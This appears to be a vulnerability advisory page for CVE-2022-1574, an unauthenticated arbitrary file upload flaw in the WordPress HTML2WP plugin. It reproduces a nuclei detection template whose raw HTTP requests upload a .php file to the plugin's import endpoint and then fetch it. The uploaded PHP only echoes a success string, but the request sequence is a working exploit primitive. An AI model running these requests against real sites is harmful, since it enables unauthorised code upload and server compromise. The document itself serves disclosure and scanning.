CVE-2022-1574: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WordPress HTML2WP | POC: 已公开

漏洞描述

WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.

PoC代码[已公开]

id: CVE-2022-1574

info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.73672
    epss-percentile: 0.98774
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close

        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html

        <?php

        echo "File Upload success";

        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4a0a004730450221009d7300c4d0f6ade056f98cb2775ebbbf64b04d930da37b7646295669a810196b022041e8ecd6b01b72ec6955843deac7688358252351029c6178b49cfe268b562462:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1574.yaml